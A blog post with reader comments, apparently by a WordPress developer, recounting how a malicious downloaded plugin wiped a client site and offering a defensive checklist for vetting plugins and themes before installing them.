Plugins – “Use at Your Own Risk!”
Ok, so the title is a little bit dramatic and a lot paranoid. But, you should ALWAYS keep it in mind when you install a new plugin to your WordPress site.
When you install a new plugin, or even a theme for that matter, you put your trust 100% in the programmer. You open your world up to whatever they decide is the right way to do things or what they think it is that you really need to be able to do. Now I trust a lot of people, but I don’t trust anyone 100%! The human race as a whole can be very… well, I’ll stop there. I just don’t trust anyone 100%. I don’t even trust myself 100% most of the time (maybe 98.7% on a good day).
Before you go recommending a good therapist, let me explain my reasoning just a little. Not enough to scare the hell out of you so never add another plugin in your life, but just enough to make you think twice before just hitting the Install and Active button.
Plugins (and for the sake of the rest of the article, themes are included in this) are programming code. A programmer sat down at his/her computer and typed up a super, duper, handy, dandy plugin for the world to use. That is great! Plugins can be very helpful. But what if that programmer doesn’t really know what they are doing? Or “they know just enough to be dangerous” – a good term that I always thought was pretty accurate. They know how to do some things and know how to copy and paste code to do the things they don’t. But where did they get the code that they copy and pasted? Who wrote it? Was it off some snip-it of a page that talked about hacking a server – or was it posted by a guy (or girl) who hates WordPress and is gonna show the world? Who knows. That is how sometimes even the most good-intentioned programmer goes wrong. If you don’t know the programmer who is releasing the code, how much do you trust that the person he/she got “some” of his/her code from? Did he/she actually know what they were doing? Who the heck knows – and that is scary! I don’t know them from Adam, and you want me to trust them with MY site? Hell no!
Scary when you really think about it, I know. To show just how scary, I’ll share a little story that happened to me – not too very long ago:
I had been using a certain plugin for some time that helps to do something helpful for client’s sites (I’ll leave out the name to protect the innocent). Generally what I do when I add a new install of WP to a server, is add all the plugins and themes to the correct folders, and then upload everything to the server all at once. Then what I do is install them only if I need them – and I delete the ones that I don’t need for that specific site. Well I knew that this plugin had been upgraded recently, so I brought up the ol’ Google site and typed in my search – picked the first one on the list without much thought – and downloaded the plugin – then added it to my WP install files which I uploaded to the client server.
It wasn’t until about a day later when I realized what I had done – but at that point is was too late! The very second I activated it, the site froze up. Not only did it freeze up, but it erased the database, erased many core WordPress files and proceeded to delete all the contents of the wp-content folder!
Ok, I said, what the F#&%^*! I then proceeded to log into the site via FTP and found out that the beautifully crafted, very helpful plugin had also reset the folder permissions for the root, so I could not even get into the site to make any changes! Long story somewhat short, I had to wipe the whole thing and start over. Me. Someone who does this for a living. Burned – and left with an even lower trust level in the rest of the world than previously – if that is even possible.
Yes, that really did happen! And yes, I was really p-d off! I can assure you that it will not happen again. I check ALL plugins I install before I add them, and I now test all new plugins on a Development site before I add them to a live site. It goes to show that even those who know what they are doing can get caught in the trap.
Now, I am not saying that this will happen to everyone. But anyone who goes searching around the web looking for that ‘perfect’ plugin or installs dozens of plugins just to see how they work or what they do, will be burned eventually – if they don’t take certain precautions. Here is a simple checklist of items that could help save your site – and your sanity. Keep in mind that ALL plugins and themes are “Use at your own risk“! If you truly understand that, then continue on:
- Before you think about adding a plugin or theme – BACK UP YOUR DATABASE! Yes, BACK UP YOUR DATABASE! Oh, and did I mention, BACK UP YOUR DATABASE? And don’t just back it up, DOWNLOAD the backup as well. If malicious code wipes your content folder – that backup gets wiped as well – so download it or email it to yourself. A good Backup plugin for WordPress is WP DB Backup – it has been downloaded almost 400,000 times, has a good ranking and I personally have used it on over 100 sites – including my own.
- Whenever possible, download plugins only from WordPress.org. You have a less likely chance of having problems because the plugins have already been downloaded and tested by others.
- If you get them from WordPress.org (or the Add Plugin option in the admin area), look for plugins with a high rating. That means others have used it, and ranked it. Word to the wise – if it has a 100% ranking and it is only ranked by 1 person, that is PROBABLY the plugin creator. I rank my own with 5 stars – so I immediately assume ALL others do the same. The only difference being, I know I can trust myself enough to rank it that way.
- If you know how to program – LOOK AT THE CODE! You can sometimes easily spot malicious attempts at killing your site or stealing your information – or opening a security hole that sucks everything through it including your monitor and keyboard.
- If you don’t know how to program and you want to be extra careful, scan the plugin files with an Anti-Virus or Anti-Malware software first. It won’t hurt.
- If you have a development site, test the plugin there first. If not, do a little research on the web – search Google for the plugin name and see if there are complaints about it anywhere and what they are. If the only complaint you find is that a user hates the color scheme, then you can be pretty sure you’re safe – but if there are 10 complaints about it crashing their site – stay away!
- If you have to install a plugin from the web and not WordPress.org, at least make sure you can read the site language before you download the plugin. If not – who knows what you are getting! I can’t tell you how many times… you get the point – I hope.
If you get to that point and you have activated the plugin – then this SHOULD be common sense – but you would be surprised. If the plugin requires that you enter PERSONAL information such as PayPal login AND password (username is sometimes required for many plugins – and is usually ok), or Credit Card data or ANYTHING you feel uncomfortable providing, then DO NOT USE IT! If you can verify 100% without a doubt that the information is not being sent to some third party person sitting in a lounge chair in Bermuda using your credit card to buy drinks, then go ahead, use it – otherwise, DON’T! Just delete it and move on.
Remember – plugins can be a good thing if you take precautions to make sure they are legitimate. Otherwise, you might as well turn the keys to your new car over to the 18 year old mail man – just in case he ever needs to move your car to deliver the mail while your out of town for two months. Use COMMON SENSE!

Hi Don,
You are exactly right…a hacker can do some really malicious stuff with a plugin. I would expect that even the stuff in the WordPress.org plugins directory might be vulnerable to someone with bad intentions, though as you say, a little less likely than out on the open web. I’d like to think that they have some sort of magical code scanner that will reject any malicious code, but if they did, they probably would have sold that code for many millions of dollars and retired.
As a plugin developer myself, I worry about how I might inadvertently be exposing my users to attacks, particularly since my plugin allows people to upload images and forms to your WordPress blog and displays them in galleries, etc.
Uploads are particularly dangerous.
That said, I look at a couple of things when choosing plugins:
1) Is this plugin being released by a Company that has something to lose if their reputation gets tarnished by malicious code?
2) How many downloads (as reported by WordPress.org – not the plugin’s site) are there? The more downloads, the safer I feel.
3) How many plugins has this author released, and how many downloads of his other plugins?
Those are some lazy precautions that folks can take pretty easily.
BTW, thanks for chiming in on the Pay for Plugins post over on WebLogToolsCollection…it is a little disheartening to see how little some people value the time, efforts, and skills of plugin developers.
Best regards,
Byron
Byron,
Thanks for the input! Those are some great “basic” best practices that everyone can easily do – developer or not. As it is said – better safe than sorry – because safe only takes two extra minutes but sorry takes a whole hell of a lot of time to fix.
While reading the comments on the Pay for Plugins post, I was just surprised at how many people immediately acted like all Plugins were going to become Pay plugins overnight. I’m sure the tables would turn if they were the ones that needed to provide the support – I would bet there would be a huge reversal of opinion. It is so easy to forget how if you have a problem, your one little question to the developer seems like nothing – but add up all the little problems or questions and it can become a full time, non-paying job.
I know the grass on both sides of the fence – and there are always brown patches – no matter what side you are on. I currently have no “Pay” Plugins, but I have tossed around the idea many times over the past month or two. As my plugins become more popular, it becomes harder and harder to provide the support I would like to provide. I’ve been fortunate in the amount of donations I get, but in reality, the amount of time it takes to develop and support them makes the return equal out to about $0.35 /hour for my time… ask a plugin user if they are willing to work for that, and chances are the answer is no.
Warm regards,
Don